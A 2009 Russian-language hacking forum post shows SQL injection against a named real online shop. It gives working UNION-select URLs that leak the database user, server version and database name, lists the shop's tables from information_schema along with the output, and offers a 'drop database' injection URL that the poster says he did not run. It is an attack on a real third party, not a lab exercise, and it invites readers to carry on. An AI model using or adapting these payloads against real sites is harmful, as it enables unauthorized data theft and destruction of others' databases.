Тема: SQL Инъекции
Показать сообщение отдельно

  #4  
Старый 07.10.2009, 04:03
Kamik
Флудер
Регистрация: 02.12.2008
Сообщений: 4,294,967,295
С нами: 9179218

Репутация: 155


По умолчанию
Какойто онлаин магазин)))

http://www.avtax.ru/?info=3+union+select+1,concat_ws(user(),0x3a,versi on(),0x3a,database()),3,4,5/*&subinfo=9

А вот и прикол! вывод результата

# Кто мы?

# :avtax2@localhost.localdomain5.0.24-standardavtax2@localhost.localdomain:avtax2@localh ost.localdomaindb_avtax2


Далее

http://www.avtax.ru/?info=3+union+select+1,table_name,3,4,5+from+infor mation_schema.tables/*&subinfo=9

PHP код:
# Кто мы?

# CHARACTER_SETS

# COLLATIONS

# COLLATION_CHARACTER_SET_APPLICABILITY

# COLUMNS

# COLUMN_PRIVILEGES

# KEY_COLUMN_USAGE

# ROUTINES

# SCHEMATA

# SCHEMA_PRIVILEGES

# STATISTICS

# TABLES

# TABLE_CONSTRAINTS

# TABLE_PRIVILEGES

# TRIGGERS

# USER_PRIVILEGES

# VIEWS

# tabCategories

# tabInfo

# tabMainInfo

# tabModels

# tabSex

# tabSubTovars

# tabTovars

# tabTovars_copy 
Далее думаю ясно всем будет))))

Также можно выполнить

http://www.avtax.ru/?info=3+drop+database+db_avtax2/*&subinfo=9

Но я не стал этого делать...
Последний раз редактировалось Kamik; 07.10.2009 в 04:10..
 
Ответить с цитированием